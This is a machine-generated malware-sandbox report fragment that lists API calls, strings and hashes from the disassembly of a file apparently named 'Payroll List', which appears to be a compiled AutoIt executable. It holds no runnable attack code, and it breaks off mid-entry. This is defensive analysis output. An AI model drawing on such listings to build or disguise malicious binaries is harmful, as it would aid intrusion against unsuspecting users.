                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 699586101-1459072770
                                                                    • Opcode ID: ac3f3748e6dc4de246139ff46be031b504dc28a79e025aed5618ac9e73fe10d0
                                                                    • Instruction ID: 8ee238f50f6b4f2a6b6abc62c8af1bb0d4aba2ff752076beef32424f468a32ab
                                                                    • Opcode Fuzzy Hash: ac3f3748e6dc4de246139ff46be031b504dc28a79e025aed5618ac9e73fe10d0
                                                                    • Instruction Fuzzy Hash: DB412672A00201BBEB05AB74DC47EBF777CDF65710F04006AF905E2192EB75DA11C6A6
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013A939
                                                                    • GetSystemMetrics.USER32(00000007), ref: 0013A941
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013A96C
                                                                    • GetSystemMetrics.USER32(00000008), ref: 0013A974
                                                                    • GetSystemMetrics.USER32(00000004), ref: 0013A999
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0013A9B6
                                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0013A9C6
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0013A9F9
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0013AA0D
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0013AA2B
                                                                    • GetStockObject.GDI32(00000011), ref: 0013AA47
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0013AA52
                                                                      • Part of subcall function 0013B63C: GetCursorPos.USER32(000000FF), ref: 0013B64F
                                                                      • Part of subcall function 0013B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0013B66C
                                                                      • Part of subcall function 0013B63C: GetAsyncKeyState.USER32(00000001), ref: 0013B691
                                                                      • Part of subcall function 0013B63C: GetAsyncKeyState.USER32(00000002), ref: 0013B69F
                                                                    • SetTimer.USER32(00000000,00000000,00000028,0013AB87), ref: 0013AA79
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Window$Foreground
                                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                    • API String ID: 62970417-1919597938
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00183735
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,001BDC00,00000000,?,00000000,?,?), ref: 001837A3
                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001837EB
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00183874
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00183B94
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00183BA1
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 536824911-966354055
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00186C56
                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00186D16
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                    • API String ID: 3974292440-719923060
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0015CF91
                                                                    • __swprintf.LIBCMT ref: 0015D032
                                                                    • _wcscmp.LIBCMT ref: 0015D045
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0015D09A
                                                                    • _wcscmp.LIBCMT ref: 0015D0D6
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0015D10D
                                                                    • GetDlgCtrlID.USER32(?), ref: 0015D15F
                                                                    • GetWindowRect.USER32(?,?), ref: 0015D195
                                                                    • GetParent.USER32(?), ref: 0015D1B3
                                                                    • ScreenToClient.USER32(00000000), ref: 0015D1BA
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0015D234
                                                                    • _wcscmp.LIBCMT ref: 0015D248
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0015D26E
                                                                    • _wcscmp.LIBCMT ref: 0015D282
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                    • String ID: %s%u
                                                                    • API String ID: 3119225716-679674701
                                                                    APIs
                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0015D8EB
                                                                    • _wcscmp.LIBCMT ref: 0015D8FC
                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0015D924
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0015D941
                                                                    • _wcscmp.LIBCMT ref: 0015D95F
                                                                    • _wcsstr.LIBCMT ref: 0015D970
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0015D9A8
                                                                    • _wcscmp.LIBCMT ref: 0015D9B8
                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0015D9DF
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0015DA28
                                                                    • _wcscmp.LIBCMT ref: 0015DA38
                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0015DA60
                                                                    • GetWindowRect.USER32(00000004,?), ref: 0015DAC9
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                    • String ID: @$ThumbnailClass
                                                                    • API String ID: 1788623398-1539354611
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                    • API String ID: 1038674560-1810252412
                                                                    APIs
                                                                    • LoadIconW.USER32(00000063), ref: 0015EAB0
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0015EAC2
                                                                    • SetWindowTextW.USER32(?,?), ref: 0015EAD9
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0015EAEE
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0015EAF4
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0015EB04
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0015EB0A
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0015EB2B
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0015EB45
                                                                    • GetWindowRect.USER32(?,?), ref: 0015EB4E
                                                                    • SetWindowTextW.USER32(?,?), ref: 0015EBB9
                                                                    • GetDesktopWindow.USER32 ref: 0015EBBF
                                                                    • GetWindowRect.USER32(00000000), ref: 0015EBC6
                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0015EC12
                                                                    • GetClientRect.USER32(?,?), ref: 0015EC1F
                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0015EC44
                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0015EC6F
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                    • String ID:
                                                                    • API String ID: 3869813825-0
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 001779C6
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 001779D1
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 001779DC
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 001779E7
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 001779F2
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 001779FD
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00177A08
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00177A13
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00177A1E
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00177A29
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00177A34
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00177A3F
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00177A4A
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00177A55
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00177A60
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00177A6B
                                                                    • GetCursorInfo.USER32(?), ref: 00177A7B
                                                                    Similarity
                                                                    • API ID: Cursor$Load$Info
                                                                    • String ID:
                                                                    • API String ID: 2577412497-0
                                                                    APIs
                                                                      • Part of subcall function 0013E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0012C8B7,?,00002000,?,?,00000000,?,0012419E,?,?,?,001BDC00), ref: 0013E984
                                                                      • Part of subcall function 0012660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001253B1,?,?,001261FF,?,00000000,00000001,00000000), ref: 0012662F
                                                                    • __wsplitpath.LIBCMT ref: 0012C93E
                                                                      • Part of subcall function 00141DFC: __wsplitpath_helper.LIBCMT ref: 00141E3C
                                                                    • _wcscpy.LIBCMT ref: 0012C953
                                                                    • _wcscat.LIBCMT ref: 0012C968
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0012C978
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0012CABE
                                                                      • Part of subcall function 0012B337: _wcscpy.LIBCMT ref: 0012B36F
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                    • API String ID: 2258743419-1018226102
                                                                    • Opcode ID: 3881469397f966a7e89bfc0af88f0f12d424d9b929d7b2a2dab1bab784bb8953
                                                                    • Instruction ID: 4c48b9c85da09d96bee5217d5761d1c7b7e0a6fa55f82d59a7d0c306ff2fc409
                                                                    • Opcode Fuzzy Hash: 3881469397f966a7e89bfc0af88f0f12d424d9b929d7b2a2dab1bab784bb8953
                                                                    • Instruction Fuzzy Hash: B012A2715083419FCB24EF24D891AAFBBF5BFA9304F00491EF59993261DB30DA59CB92
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0018CEFB
                                                                    • DestroyWindow.USER32(?,?), ref: 0018CF73
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0018CFF4
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0018D016
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018D025
                                                                    • DestroyWindow.USER32(?), ref: 0018D042
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00120000,00000000), ref: 0018D075
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018D094
                                                                    • GetDesktopWindow.USER32 ref: 0018D0A9
                                                                    • GetWindowRect.USER32(00000000), ref: 0018D0B0
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0018D0C2
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0018D0DA
                                                                      • Part of subcall function 0013B526: GetWindowLongW.USER32(?,000000EB), ref: 0013B537
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 3877571568-3619404913
                                                                    • Opcode ID: da9941931f795dc8603504a08d0cffb6c542186ce96ac7466560871d6766633d
                                                                    • Instruction ID: a3947323f43bdb5591b5062f2bb224330098f97fe4b096731188e4f8eaf6593e
                                                                    • Opcode Fuzzy Hash: da9941931f795dc8603504a08d0cffb6c542186ce96ac7466560871d6766633d
                                                                    • Instruction Fuzzy Hash: D871FFB4140345AFD724DF68EC84FAA77E5EB89704F48451DF9858B2A1D770EA82CF22
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0018F37A
                                                                      • Part of subcall function 0018D7DE: ClientToScreen.USER32(?,?), ref: 0018D807
                                                                      • Part of subcall function 0018D7DE: GetWindowRect.USER32(?,?), ref: 0018D87D
                                                                      • Part of subcall function 0018D7DE: PtInRect.USER32(?,?,0018ED5A), ref: 0018D88D
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0018F3E3
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0018F3EE
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0018F411
                                                                    • _wcscat.LIBCMT ref: 0018F441
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0018F458
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0018F471
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0018F488
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0018F4AA
                                                                    • DragFinish.SHELL32(?), ref: 0018F4B1
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0018F59C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 169749273-3440237614
                                                                    • Opcode ID: 2936fc03a8dd7a2ef3d0ac7d8724ba8490e8d68199cabf620345f5c5d17dc298
                                                                    • Instruction ID: 16ea08853db2a056b8167668f2cec1b94b6b883b1ae589f37dffc2497976cfa4
                                                                    • Opcode Fuzzy Hash: 2936fc03a8dd7a2ef3d0ac7d8724ba8490e8d68199cabf620345f5c5d17dc298
                                                                    • Instruction Fuzzy Hash: 4E612871108300AFC711EF64EC85E9FBBF8EF99710F000A1EF695965A1DB709A59CB52
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0016AB3D
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0016AB46
                                                                    • VariantClear.OLEAUT32(?), ref: 0016AB52
                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0016AC40
                                                                    • __swprintf.LIBCMT ref: 0016AC70
                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0016AC9C
                                                                    • VariantInit.OLEAUT32(?), ref: 0016AD4D
                                                                    • SysFreeString.OLEAUT32(00000016), ref: 0016ADDF
                                                                    • VariantClear.OLEAUT32(?), ref: 0016AE35
                                                                    • VariantClear.OLEAUT32(?), ref: 0016AE44
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0016AE80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                    • API String ID: 3730832054-3931177956
                                                                    • Opcode ID: 53fbc18ab717b906fee6c80863d99ae4ab3d13cb09c55c3eea120fb6a59972be
                                                                    • Instruction ID: 4a797848a939fa996005bc602609bd628925d2b756f127285471070126473a39
                                                                    • Opcode Fuzzy Hash: 53fbc18ab717b906fee6c80863d99ae4ab3d13cb09c55c3eea120fb6a59972be
                                                                    • Instruction Fuzzy Hash: 48D10071A04225EBCB249F65DC84BAEF7B9FF09700F558059E405AB581DB70ECA0DFA2
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 001871FC
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00187247
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 3974292440-4258414348
                                                                    • Opcode ID: f8e27af447982313d7615bf6fdcaf21f2a16636c7defbd7d4402ffad6147c506
                                                                    • Instruction ID: 2b84944f5e3ca7c6f5e34051f7e27ed2ec869eaac176dd4daf2359e166fead13
                                                                    • Opcode Fuzzy Hash: f8e27af447982313d7615bf6fdcaf21f2a16636c7defbd7d4402ffad6147c506
                                                                    • Instruction Fuzzy Hash: F2914E342087119FCB04FF24D851A6EB7A1BF64314F114859F89A6B7E2DB30EE5ADB81
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0018E5AB
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0018BEAF), ref: 0018E607
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E647
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E68C
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E6C3
                                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0018BEAF), ref: 0018E6CF
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0018E6DF
                                                                    • DestroyIcon.USER32(?,?,?,?,?,0018BEAF), ref: 0018E6EE
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0018E70B
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0018E717
                                                                      • Part of subcall function 00140FA7: __wcsicmp_l.LIBCMT ref: 00141030
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 1212759294-1154884017
                                                                    • Opcode ID: 4813828ffd6076e5f4aa60cf17e40a215f4d02225bff10251e6f51bc62117563
                                                                    • Instruction ID: 430784ea743cfe8d8470351392cca3386a0fa2ecb8b12c56166d6a1fbc12c655
                                                                    • Opcode Fuzzy Hash: 4813828ffd6076e5f4aa60cf17e40a215f4d02225bff10251e6f51bc62117563
                                                                    • Instruction Fuzzy Hash: 6B61CF71500615FBEB14EF64DC46FFE7BA8BB18714F204115F915E61D0EB709A90CBA0
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • CharLowerBuffW.USER32(?,?), ref: 0016D292
                                                                    • GetDriveTypeW.KERNEL32 ref: 0016D2DF
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016D327
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016D35E
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016D38C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 1148790751-4113822522
                                                                    • Opcode ID: b3327f0b6cb209e3cc725f519d1677102a5d03fc11845e5f683e91d6b410ee8a
                                                                    • Instruction ID: 46860959421786aa360cb1f9acc91e3a833a97583722c2bb788e893dbd7da087
                                                                    • Opcode Fuzzy Hash: b3327f0b6cb209e3cc725f519d1677102a5d03fc11845e5f683e91d6b410ee8a
                                                                    • Instruction Fuzzy Hash: 75514E716047159FC700EF10D98196EB7E4FFA8758F00486DF89AA7291DB31EE15CB92
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00193973,00000016,0000138C,00000016,?,00000016,001BDDB4,00000000,?), ref: 001626F1
                                                                    • LoadStringW.USER32(00000000,?,00193973,00000016), ref: 001626FA
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00193973,00000016,0000138C,00000016,?,00000016,001BDDB4,00000000,?,00000016), ref: 0016271C
                                                                    • LoadStringW.USER32(00000000,?,00193973,00000016), ref: 0016271F
                                                                    • __swprintf.LIBCMT ref: 0016276F
                                                                    • __swprintf.LIBCMT ref: 00162780
                                                                    • _wprintf.LIBCMT ref: 00162829
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00162840
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 618562835-2268648507
                                                                    • Opcode ID: 4e19e5b1972a549542f13e90198375fedcc2efe804da8ca5f813948bc207fc5c
                                                                    • Instruction ID: 029cb91c52f4f8fc37e1785bddca94b39676fc63c5191fd210565d188318472d
                                                                    • Opcode Fuzzy Hash: 4e19e5b1972a549542f13e90198375fedcc2efe804da8ca5f813948bc207fc5c
                                                                    • Instruction Fuzzy Hash: ED411E72800629BACB14FBD0ED86DEEB779AF65340F100065F60177092EB746F69CBA1
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0016D0D8
                                                                    • __swprintf.LIBCMT ref: 0016D0FA
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0016D137
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0016D15C
                                                                    • _memset.LIBCMT ref: 0016D17B
                                                                    • _wcsncpy.LIBCMT ref: 0016D1B7
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0016D1EC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0016D1F7
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0016D200
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0016D20A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
